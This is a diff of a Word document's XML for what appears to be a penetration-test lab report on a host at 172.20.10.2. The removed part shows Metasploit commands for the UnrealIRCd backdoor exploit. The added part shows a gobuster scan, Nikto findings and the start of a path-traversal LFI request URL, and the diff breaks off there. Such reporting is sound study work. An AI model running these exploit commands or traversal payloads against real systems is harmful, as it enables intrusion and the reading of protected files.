-        <w:t>This version contains a known backdoor vulnerability.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="095DCDBF" wp14:editId="61F1A158">
-            <wp:extent cx="5731510" cy="2773045"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
-            <wp:docPr id="1445031701" name="Picture 32"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1445031701" name="Picture 1445031701"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId12" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2773045"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Exploitation Phase</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Using Metasploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Metasploit was used to exploit the backdoor vulnerability.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Commands:</w:t>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6564,8 +5834,9 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>msfconsole</w:t>
+        <w:t>gobuster dir -u http://172.20.10.2 -w /</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6577,16 +5848,62 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:br/>
-        <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/share/wordlists/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>dirb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/common.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -6594,15 +5911,231 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Discovered:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">• </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>admin.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">• </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">• </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>css</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>js</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/images</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE3A099" wp14:editId="506586CF">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="1912453998" name="Picture 34"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3926147A" wp14:editId="5EBBEF15">
+            <wp:extent cx="5226050" cy="2628900"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2128889527" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6610,17 +6143,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1912453998" name="Picture 1912453998"/>
+                    <pic:cNvPr id="2128889527" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6628,7 +6155,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
+                      <a:ext cx="5226050" cy="2628900"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6643,17 +6170,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:outlineLvl w:val="1"/>
         <w:rPr>
@@ -6680,7 +6196,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Configuring the Exploit</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Vulnerability Analysis</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6700,7 +6217,158 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Set target IP:</w:t>
+        <w:t>Nikto scan revealed:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>• Apache outdated version</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Directory indexing enabled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Sensitive file exposure possible</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• LFI vulnerability detected</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C9AA9C" wp14:editId="076DF1B4">
+            <wp:extent cx="5731510" cy="1584960"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1312245084" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1312245084" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1584960"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Exploitation Phase (LFI)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Used Local File Inclusion to access system files:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6746,7 +6414,35 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>set RHOSTS 172.20.10.2</w:t>
+        <w:t>http://172.20.10.2/index.php?page</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=../../../..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
